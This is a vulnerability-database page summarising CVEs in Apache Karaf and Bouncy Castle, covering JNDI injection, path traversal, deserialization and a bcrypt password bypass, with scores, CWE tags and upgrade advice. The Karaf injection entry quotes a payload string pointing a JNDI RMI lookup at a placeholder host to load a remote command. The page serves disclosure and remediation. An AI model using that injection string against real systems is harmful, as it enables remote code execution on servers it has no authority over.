CVSS: 10.0EPSS: 2%CPEs: 2EXPL: 0CVE-2022-40145 – Apache Karaf: JDBC JAAS LDAP injection
https://notcve.org/view.php?id=CVE-2022-40145
21 Dec 2022 — This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable ... • https://karaf.apache.org/security/cve-2022-40145.txt • CWE-20: Improper Input Validation CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') •
CVSS: 5.4EPSS: 0%CPEs: 2EXPL: 0CVE-2022-22932 – Path traversal flaws
https://notcve.org/view.php?id=CVE-2022-22932
26 Jan 2022 — Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. • https://karaf.apache.org/security/cve-2022-22932.txt • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVSS: 8.1EPSS: 0%CPEs: 1EXPL: 0CVE-2021-41766 – Insecure Java Deserialization in Apache Karaf
https://notcve.org/view.php?id=CVE-2021-41766
26 Jan 2022 — Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available wi... • https://karaf.apache.org/security/cve-2021-41766.txt • CWE-502: Deserialization of Untrusted Data •
CVSS: 8.1EPSS: 6%CPEs: 39EXPL: 3CVE-2020-28052 – bouncycastle: password bypass in OpenBSDBCrypt.checkPassword utility possible
https://notcve.org/view.php?id=CVE-2020-28052
18 Dec 2020 — An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different. Se detectó un problema en Legion of the Bouncy Castle BC Java versiones 1.65 y 1.66. El método de la utilidad OpenBSDBCrypt.checkPassword comparó datos incorrectos al comprobar la contraseña, permitiendo a unas contraseña... • https://github.com/madstap/bouncy-castle-generative-test-poc • CWE-287: Improper Authentication •